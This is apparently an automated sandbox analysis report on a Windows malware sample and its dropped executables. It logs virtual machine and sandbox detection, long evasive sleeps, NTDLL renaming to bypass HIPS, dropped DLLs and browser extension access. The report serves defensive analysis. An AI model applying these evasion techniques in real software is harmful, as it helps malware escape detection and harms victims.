Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System\svchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Renames NTDLL to bypass HIPS
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: webgfvd, 00000018.00000002.383336183.00000000005B7000.00000004.00000020.sdmp Binary or memory string: ASWHOOK#
Contains capabilities to detect virtual machines
Source: C:\Windows\System\svchost.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E156B90 rdtsc 1_2_6E156B90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\2531.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Thread delayed: delay time: 180000
Source: C:\Windows\System\svchost.exe Thread delayed: delay time: 180000
Source: C:\Windows\System\svchost.exe Thread delayed: delay time: 300000
Source: C:\Windows\System\svchost.exe Thread delayed: delay time: 180000
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 632 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 364 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Window / User API: threadDelayed 1788 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Window / User API: threadDelayed 573 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldif60.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bquyobss.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\2531.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 4904 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe TID: 3604 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe TID: 5256 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe TID: 5144 Thread sleep time: -1980000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe TID: 5820 Thread sleep time: -150000s >= -30000s
Source: C:\Windows\System\svchost.exe TID: 1716 Thread sleep count: 72 > 30
Source: C:\Windows\System\svchost.exe TID: 1716 Thread sleep time: -12960000s >= -30000s
Source: C:\Windows\System\svchost.exe TID: 5248 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System\svchost.exe TID: 1716 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6132 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2531.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System\svchost.exe Last function: Thread delayed
Source: C:\Windows\System\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2531.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Thread delayed: delay time: 180000
Source: C:\Windows\System\svchost.exe Thread delayed: delay time: 180000
Source: C:\Windows\System\svchost.exe Thread delayed: delay time: 300000
Source: C:\Windows\System\svchost.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: 2531.exe, 00000019.00000003.484898075.00000000014FD000.00000004.00000001.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000004.00000000.274568322.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.261644595.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.273313301.0000000008270000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.501163929.0000029B8A340000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.327282314.000001DA80E60000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.356495625.0000024496740000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.377708887.0000026E50140000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.511724942.00000000060D0000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.416925963.0000019C23660000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.261703560.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000005.00000002.503151394.000001B6A2062000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000005.00000002.503113757.000001B6A2055000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.258224546.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000004.00000000.274633896.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000004.00000000.273313301.0000000008270000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.501163929.0000029B8A340000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.327282314.000001DA80E60000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.356495625.0000024496740000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.377708887.0000026E50140000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.511724942.00000000060D0000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.416925963.0000019C23660000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.293519041.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000004.00000000.273313301.0000000008270000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.501163929.0000029B8A340000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.327282314.000001DA80E60000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.356495625.0000024496740000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.377708887.0000026E50140000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.511724942.00000000060D0000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.416925963.0000019C23660000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.274633896.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: 2531.exe, 00000019.00000003.484898075.00000000014FD000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareVKEG1DXMWin32_VideoControllerDGF3VVG8VideoController120060621000000.000000-00013825088display.infMSBDA44T3ADSNPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsMHXL79M2
Source: svchost.exe, 00000008.00000002.495388825.0000029B89668000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.495340608.000001EF2E029000.00000004.00000001.sdmp, 2531.exe, 00000019.00000002.499301393.0000000001433000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
